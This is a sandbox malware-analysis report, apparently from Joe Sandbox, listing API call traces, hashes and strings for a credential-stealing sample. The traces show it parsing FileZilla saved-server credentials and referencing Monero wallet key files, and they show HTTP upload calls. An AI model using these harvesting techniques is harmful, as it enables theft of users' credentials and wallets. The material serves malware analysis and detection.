                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 4a03526c61d6811fd58fc4b103af0a1f27c475244fd196edc7e062cf99455f1c
                              • Instruction ID: c838f67bdc93de1cd8abb660d1b6e23d28f13118cafd236eab483794ea647b0b
                              • Opcode Fuzzy Hash: 4a03526c61d6811fd58fc4b103af0a1f27c475244fd196edc7e062cf99455f1c
                              • Instruction Fuzzy Hash: 664138F3A186009FE3586A29EC4577AF3E6EFD4311F2B863DD6C483344E93859058656
                              Function 00911E8B Relevance: .2, Instructions: 150COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b2a2bb78760af693dce7afa4343974bcfaeecfa83308378f11733f938d06fa64
                              • Instruction ID: 4be1fa9fa35100de7553c4a800d22fa06623e135be90b8ca3330c66b0e134d9e
                              • Opcode Fuzzy Hash: b2a2bb78760af693dce7afa4343974bcfaeecfa83308378f11733f938d06fa64
                              • Instruction Fuzzy Hash: 9A41F6F3E187044BE3046E69ECC537AB7D6EB90310F1B053DDB8987780E9B959458686
                              Function 009222A7 Relevance: .1, Instructions: 142COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 64de22932dacc2c47247929f5f08db470742925183813ae7c837b955bdff1e3c
                              • Instruction ID: 602142550c2366197afa839127491dbf96b397fdda669d348907ad61c1b78cf9
                              • Opcode Fuzzy Hash: 64de22932dacc2c47247929f5f08db470742925183813ae7c837b955bdff1e3c
                              • Instruction Fuzzy Hash: 3041C3F7E046280BF31059A8DC85776B686EB90324F2B423CDF88977C5E87AAC1547D6
                              Function 00AA5E2F Relevance: .1, Instructions: 83COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: ec2af0d6e5ddf513dbe89ae1a8a359c0d866c7980c2dd6bff794f53c0f162401
                              • Instruction ID: e1ab16f4dc9a64bf81fce8c15df1218bd8e1708c0d17e2c56ce296b1e56af16b
                              • Opcode Fuzzy Hash: ec2af0d6e5ddf513dbe89ae1a8a359c0d866c7980c2dd6bff794f53c0f162401
                              • Instruction Fuzzy Hash: 4F213DB250C604AFE349BE1ADC817AAFBE6EF99310F16492DD3C583650EB7154408A87
                              Function 00659750 Relevance: .0, Instructions: 15COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                              • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                              • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                              • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                              Function 00650250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366stringmemoryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0065A740: lstrcpy.KERNEL32(00660E17,00000000), ref: 0065A788
                                • Part of subcall function 00658DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00658E0B
                                • Part of subcall function 0065A920: lstrcpy.KERNEL32(00000000,?), ref: 0065A972
                                • Part of subcall function 0065A920: lstrcat.KERNEL32(00000000), ref: 0065A982
                                • Part of subcall function 0065A8A0: lstrcpy.KERNEL32(?,00660E17), ref: 0065A905
                                • Part of subcall function 0065A9B0: lstrlen.KERNEL32(?,013D8948,?,\Monero\wallet.keys,00660E17), ref: 0065A9C5
                                • Part of subcall function 0065A9B0: lstrcpy.KERNEL32(00000000), ref: 0065AA04
                                • Part of subcall function 0065A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0065AA12
                                • Part of subcall function 0065A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0065A7E6
                                • Part of subcall function 006499C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006499EC
                                • Part of subcall function 006499C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00649A11
                                • Part of subcall function 006499C0: LocalAlloc.KERNEL32(00000040,?), ref: 00649A31
                                • Part of subcall function 006499C0: ReadFile.KERNEL32(000000FF,?,00000000,0064148F,00000000), ref: 00649A5A
                                • Part of subcall function 006499C0: LocalFree.KERNEL32(0064148F), ref: 00649A90
                                • Part of subcall function 006499C0: CloseHandle.KERNEL32(000000FF), ref: 00649A9A
                                • Part of subcall function 00658E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00658E52
                              • GetProcessHeap.KERNEL32(00000000,000F423F,00660DBA,00660DB7,00660DB6,00660DB3), ref: 00650362
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00650369
                              • StrStrA.SHLWAPI(00000000,<Host>), ref: 00650385
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00660DB2), ref: 00650393
                              • StrStrA.SHLWAPI(00000000,<Port>), ref: 006503CF
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00660DB2), ref: 006503DD
                              • StrStrA.SHLWAPI(00000000,<User>), ref: 00650419
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00660DB2), ref: 00650427
                              • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00650463
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00660DB2), ref: 00650475
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00660DB2), ref: 00650502
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00660DB2), ref: 0065051A
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00660DB2), ref: 00650532
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00660DB2), ref: 0065054A
                              • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00650562
                              • lstrcat.KERNEL32(?,profile: null), ref: 00650571
                              • lstrcat.KERNEL32(?,url: ), ref: 00650580
                              • lstrcat.KERNEL32(?,00000000), ref: 00650593
                              • lstrcat.KERNEL32(?,00661678), ref: 006505A2
                              • lstrcat.KERNEL32(?,00000000), ref: 006505B5
                              • lstrcat.KERNEL32(?,0066167C), ref: 006505C4
                              • lstrcat.KERNEL32(?,login: ), ref: 006505D3
                              • lstrcat.KERNEL32(?,00000000), ref: 006505E6
                              • lstrcat.KERNEL32(?,00661688), ref: 006505F5
                              • lstrcat.KERNEL32(?,password: ), ref: 00650604
                              • lstrcat.KERNEL32(?,00000000), ref: 00650617
                              • lstrcat.KERNEL32(?,00661698), ref: 00650626
                              • lstrcat.KERNEL32(?,0066169C), ref: 00650635
                              • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00660DB2), ref: 0065068E
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                              • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                              • API String ID: 1942843190-555421843
                              • Opcode ID: a05ed5d0d9a77377311d47793266b9f0ab3f16438b0334285c9f945c1ef45042
                              • Instruction ID: 7bbfe73f4fb2a854fa59f62998abe101d49d68744839ae245c5419490e4f3939
                              • Opcode Fuzzy Hash: a05ed5d0d9a77377311d47793266b9f0ab3f16438b0334285c9f945c1ef45042
                              • Instruction Fuzzy Hash: 74D15E75900108ABDB44FBF4DD96EEE733ABF14301F444619F902A6191EF34AA0ACB66
                              Function 00645960 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495networkstringmemoryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0065A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0065A7E6
                                • Part of subcall function 006447B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00644839
                                • Part of subcall function 006447B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00644849
                                • Part of subcall function 0065A740: lstrcpy.KERNEL32(00660E17,00000000), ref: 0065A788
                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 006459F8
                              • StrCmpCA.SHLWAPI(?,013DEC50), ref: 00645A13
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00645B93
                              • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,013DED40,00000000,?,013DF058,00000000,?,00661A1C), ref: 00645E71
                              • lstrlen.KERNEL32(00000000), ref: 00645E82
                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00645E93
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00645E9A
                              • lstrlen.KERNEL32(00000000), ref: 00645EAF
                              • lstrlen.KERNEL32(00000000), ref: 00645ED8
                              • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00645EF1
                              • lstrlen.KERNEL32(00000000,?,?), ref: 00645F1B
                              • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00645F2F
                              • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00645F4C
                              • InternetCloseHandle.WININET(00000000), ref: 00645FB0
                              • InternetCloseHandle.WININET(00000000), ref: 00645FBD
                              • HttpOpenRequestA.WININET(00000000,013DEBE0,?,013DE238,00000000,00000000,00400100,00000000), ref: 00645BF8
                                • Part of subcall function 0065A9B0: lstrlen.KERNEL32(?,013D8948,?,\Monero\wallet.keys,00660E17), ref: 0065A9C5
                                • Part of subcall function 0065A9B0: lstrcpy.KERNEL32(00000000), ref: 0065AA04
                                • Part of subcall function 0065A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0065AA12
                                • Part of subcall function 0065A8A0: lstrcpy.KERNEL32(?,00660E17), ref: 0065A905
                                • Part of subcall function 0065A920: lstrcpy.KERNEL32(00000000,?), ref: 0065A972
                                • Part of subcall function 0065A920: lstrcat.KERNEL32(00000000), ref: 0065A982
                              • InternetCloseHandle.WININET(00000000), ref: 00645FC7
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                              • String ID: "$"$------$------$------
                              • API String ID: 874700897-2180234286
                              • Opcode ID: 5a3b441d309653ea15ced4b3b6be3461eb7f8595c04aa27bd36ab8ce14e0ca61
                              • Instruction ID: 016ca1ce166e87871eeafd9be9ac34a1e5e373ff708045be73dc0d641533faee
                              • Opcode Fuzzy Hash: 5a3b441d309653ea15ced4b3b6be3461eb7f8595c04aa27bd36ab8ce14e0ca61
                              • Instruction Fuzzy Hash: B212F071820118ABDB55EBE0DC95FEEB37ABF14701F50429DB50662091EF702A4DCF69
                              Function 0064CEF0 Relevance: 30.4, APIs: 20, Instructions: 375stringmemoryfileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0065A740: lstrcpy.KERNEL32(00660E17,00000000), ref: 0065A788
                                • Part of subcall function 0065A9B0: lstrlen.KERNEL32(?,013D8948,?,\Monero\wallet.keys,00660E17), ref: 0065A9C5
                                • Part of subcall function 0065A9B0: lstrcpy.KERNEL32(00000000), ref: 0065AA04
                                • Part of subcall function 0065A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0065AA12
                                • Part of subcall function 0065A8A0: lstrcpy.KERNEL32(?,00660E17), ref: 0065A905
                                • Part of subcall function 00658B60: GetSystemTime.KERNEL32(00660E1A,013DF0B8,006605AE,?,?,006413F9,?,0000001A,00660E1A,00000000,?,013D8948,?,\Monero\wallet.keys,00660E17), ref: 00658B86
                                • Part of subcall function 0065A920: lstrcpy.KERNEL32(00000000,?), ref: 0065A972
                                • Part of subcall function 0065A920: lstrcat.KERNEL32(00000000), ref: 0065A982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0064CF83
                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0064D0C7
                              • RtlAllocateHeap.NTDLL(00000000), ref: 0064D0CE
                              • lstrcat.KERNEL32(?,00000000), ref: 0064D208
                              • lstrcat.KERNEL32(?,00661478), ref: 0064D217
                              • lstrcat.KERNEL32(?,00000000), ref: 0064D22A
                              • lstrcat.KERNEL32(?,0066147C), ref: 0064D239
                              • lstrcat.KERNEL32(?,00000000), ref: 0064D24C
                              • lstrcat.KERNEL32(?,00661480), ref: 0064D25B
                              • lstrcat.KERNEL32(?,00000000), ref: 0064D26E
                              • lstrcat.KERNEL32(?,00661484), ref: 0064D27D
                              • lstrcat.KERNEL32(?,00000000), ref: 0064D290
                              • lstrcat.KERNEL32(?,00661488), ref: 0064D29F
                              • lstrcat.KERNEL32(?,00000000), ref: 0064D2B2
                              • lstrcat.KERNEL32(?,0066148C), ref: 0064D2C1
                              • lstrcat.KERNEL32(?,00000000), ref: 0064D2D4
                              • lstrcat.KERNEL32(?,00661490), ref: 0064D2E3
                                • Part of subcall function 0065A820: lstrlen.KERNEL32(00644F05,?,?,00644F05,00660DDE), ref: 0065A82B
                                • Part of subcall function 0065A820: lstrcpy.KERNEL32(00660DDE,00000000), ref: 0065A885
                              • lstrlen.KERNEL32(?), ref: 0064D32A
                              • lstrlen.KERNEL32(?), ref: 0064D339
                                • Part of subcall function 0065AA70: StrCmpCA.SHLWAPI(013D8B28,0064A7A7,?,0064A7A7,013D8B28), ref: 0065AA8F
                              • DeleteFileA.KERNEL32(00000000), ref: 0064D3B4
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                              • String ID:
                              • API String ID: 1956182324-0
                              • Opcode ID: cf809a9aa6e997ebc1712357a7ac1d53b1bcba71e96b8660996dea3f302266da
                              • Instruction ID: 59da69593cd8c50eab80b7e78c81a5ca9cceab7b37211da551a90c1783aa84fd
                              • Opcode Fuzzy Hash: cf809a9aa6e997ebc1712357a7ac1d53b1bcba71e96b8660996dea3f302266da
                              • Instruction Fuzzy Hash: A6E13371910108ABDB48EBE4DD95EEE737ABF14301F10425DF907A7091EE35AE09CB66
                              Function 0064C990 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 384filestringCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0065A740: lstrcpy.KERNEL32(00660E17,00000000), ref: 0065A788
                                • Part of subcall function 0065A920: lstrcpy.KERNEL32(00000000,?), ref: 0065A972
                                • Part of subcall function 0065A920: lstrcat.KERNEL32(00000000), ref: 0065A982
                                • Part of subcall function 0065A8A0: lstrcpy.KERNEL32(?,00660E17), ref: 0065A905
                                • Part of subcall function 0065A9B0: lstrlen.KERNEL32(?,013D8948,?,\Monero\wallet.keys,00660E17), ref: 0065A9C5
                                • Part of subcall function 0065A9B0: lstrcpy.KERNEL32(00000000), ref: 0065AA04
                                • Part of subcall function 0065A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0065AA12
                              • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,013DD528,00000000,?,0066144C,00000000,?,?), ref: 0064CA6C
                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0064CA89
                              • GetFileSize.KERNEL32(00000000,00000000), ref: 0064CA95
                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0064CAA8
                              • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0064CAD9
                              • StrStrA.SHLWAPI(?,013DD540,00660B52), ref: 0064CAF7
                              • StrStrA.SHLWAPI(00000000,013DD330), ref: 0064CB1E
